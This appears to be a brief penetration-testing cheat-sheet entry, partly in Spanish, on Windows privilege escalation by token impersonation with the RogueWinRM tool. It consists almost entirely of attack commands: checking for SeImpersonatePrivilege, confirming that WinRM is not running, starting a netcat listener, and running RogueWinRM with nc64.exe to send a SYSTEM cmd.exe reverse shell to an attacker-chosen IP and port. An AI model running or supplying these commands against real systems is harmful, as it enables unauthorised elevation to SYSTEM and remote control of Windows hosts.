PRIMARY TOKEN IMPERSONATION via SeImpersonate
/ SeAssignPrimaryToken
whoami /priv
# SeImpersonatePrivilege Impersonate a client after authentication Enabled
winrm enumerate winrm/config/listener
Para explotar este vector WinRM no debe estar en ejecución.
nc -lvnp <port>
https://github.com/antonioCoco/RogueWinRM
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe <ip-a> <port>"